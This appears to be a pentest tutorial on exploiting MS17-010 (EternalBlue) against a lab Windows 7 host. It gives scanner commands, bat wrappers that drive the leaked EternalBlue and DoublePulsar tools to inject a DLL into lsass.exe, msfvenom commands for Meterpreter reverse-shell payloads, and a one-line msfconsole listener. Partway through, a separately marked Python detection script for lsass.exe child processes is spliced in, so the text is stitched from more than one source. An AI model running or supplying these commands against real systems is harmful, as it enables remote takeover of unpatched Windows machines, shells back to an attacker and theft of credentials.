Domain penetration: several ways to exploit MS17-010

  • This article mainly covers using the NSA's original MS17-010 tools
  • There are already plenty of metasploit write-ups online, so that route is not covered here

Vulnerability overview

Name: EternalBlue

Identifiers: MS17-010, CVE-2017-0143/0144/0145/0146/0147/0148

Type: buffer overflow

Affected systems: Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; Windows Server 2016

Lab environment

kali

  • ip: 192.168.0.18

win7

  • ip: 192.168.0.28


Checking for MS17-010

checker.py

GitHub: https://github.com/worawit/MS17-010

python2 checker.py 192.168.0.28

check.bat

GitHub: https://github.com/3gstudent/Smbtouch-Scanner

Create check.bat with the following content:

@Smbtouch-1.1.1.exe --TargetIp %1 --OutConfig 1.txt

check.bat 192.168.0.28

Ladon

Ladon.exe 192.168.0.28 MS17010

fscan

fscan -h 192.168.0.28

In short, there are many ways to check; pick whichever you prefer.

Exploiting MS17-010

With a firewall

Reference:

I did not manage to get this working; I am still too much of a novice.

[MS17010 exploitation] https://www.bilibili.com/video/BV1Ye4y1k7X9/?share_source=copy_web&vd_source=2eb72ea5238fe3398c820713b04697ff

Without a firewall

The environment here differs from the one above, but that does not affect the procedure.

GitHub:

  1. https://github.com/x0rz/EQGRP_Lost_in_Translation

Copy the files from the following three directories of the toolkit into a single directory (a 64-bit system can run 32-bit binaries, so just copy the 32-bit ones):

windows\lib\x86-Windows\

windows\specials\

windows\payloads\

Then, in that directory, rename Eternalblue-2.2.0.0.xml to Eternalblue-2.2.0.xml and Doublepulsar-1.3.1.0.xml to Doublepulsar-1.3.1.xml.

For convenience, wrap the tools in bat scripts.

Usage: attack.bat 192.168.0.28

@echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp %1 --TargetPort 445 --Target WIN72K8R2

Usage: backdoor.bat 192.168.0.28 x64 exp.dll (the script takes three arguments: target IP, architecture, payload DLL)

@echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60

  2. https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit

The tools are in the deps\ folder; in that directory, rename Eternalblue-2.2.0.0.xml to Eternalblue-2.2.0.xml and Doublepulsar-1.3.1.0.xml to Doublepulsar-1.3.1.xml.

Write the bat scripts; usage is the same as above.

attack.bat:

@echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --TargetIp %1 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig outlog.txt

backdoor.bat:

@echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60
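The DoublePulsar wrapper above loads the payload DLL inside lsass.exe. From the detection side, the cheapest host-level signal for that is a child process of lsass.exe, which never spawns children in normal operation, together with a binary named lsass.exe that is not the genuine one. The following is an added example, not code from the original post or from either toolkit: it applies those two rules to constructed Sysmon-style process-creation records (the field layout and the sample lines are assumptions made for this example).

```python
import ntpath
from typing import Dict, List

# Constructed Sysmon Event ID 1 (process creation) records flattened to "key=value"
# fields separated by "|". Made-up samples for this example, not real telemetry.
SAMPLE_EVENTS = [
    "EventID=1|Computer=WIN7-28|ProcessId=504|Image=C:\\Windows\\System32\\lsass.exe"
    "|ParentImage=C:\\Windows\\System32\\wininit.exe|CommandLine=C:\\Windows\\system32\\lsass.exe",
    "EventID=1|Computer=WIN7-28|ProcessId=3120|Image=C:\\Windows\\System32\\cmd.exe"
    "|ParentImage=C:\\Windows\\System32\\lsass.exe|CommandLine=cmd.exe",
    "EventID=1|Computer=WIN7-28|ProcessId=3188|Image=C:\\Windows\\System32\\notepad.exe"
    "|ParentImage=C:\\Windows\\explorer.exe|CommandLine=notepad.exe",
    "EventID=1|Computer=WIN7-28|ProcessId=3200|Image=C:\\Users\\Public\\lsass.exe"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=lsass.exe",
]

def parse_event(line: str) -> Dict[str, str]:
    """Split one flattened record into a field dict (CommandLine is assumed not to contain '|')."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields

def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules the event trips; an empty list means benign."""
    if event.get("EventID") != "1":
        return []
    image, parent = event.get("Image", ""), event.get("ParentImage", "")
    hits: List[str] = []
    # lsass.exe does not create child processes in normal operation; a child means
    # foreign code is executing inside it, e.g. a DLL loaded through the backdoor.
    if ntpath.basename(parent).lower() == "lsass.exe":
        hits.append("lsass_child_process")
    # The genuine lsass.exe lives in System32 and is started by wininit.exe.
    if ntpath.basename(image).lower() == "lsass.exe" and (
        ntpath.basename(parent).lower() != "wininit.exe"
        or not image.lower().startswith("c:\\windows\\system32\\")
    ):
        hits.append("lsass_masquerade")
    return hits

def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run every record through the rules; flagged events get a 'rules' field."""
    flagged = []
    for event in map(parse_event, lines):
        if rules := classify(event):
            flagged.append({**event, "rules": ",".join(rules)})
    return flagged
```

Against the sample records, scan() flags the cmd.exe spawned by lsass.exe and the lsass.exe running from C:\Users\Public, and leaves the genuine lsass.exe and notepad.exe alone.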

Exploit method 1

NSA's original MS17-010 tools

Remember to start a listener in metasploit first.

# generate the payload DLLs with metasploit
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx64.dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx86.dll

1. Check for MS17-010

2. Attack

3. Exploitation

Session received in metasploit

Exploit method 2

ksmb.exe by K8哥哥 (K8gege)

A user was added successfully

Exploit method 3

https://blackwolfsec.cc/2017/05/12/Eternalblue_ms17-010/

It takes several attempts before it succeeds.

# generate the shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.18 LPORT=1111 -f raw > shellcode

# run the exploit
python3 ms17-010.py --host 192.168.0.28 --file shellcode

Adding --port 445 causes an error.

1. Attack

2. After starting the listener, the session comes in

# start the listener with a single command
msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.18; set lport 1111; exploit -j; "
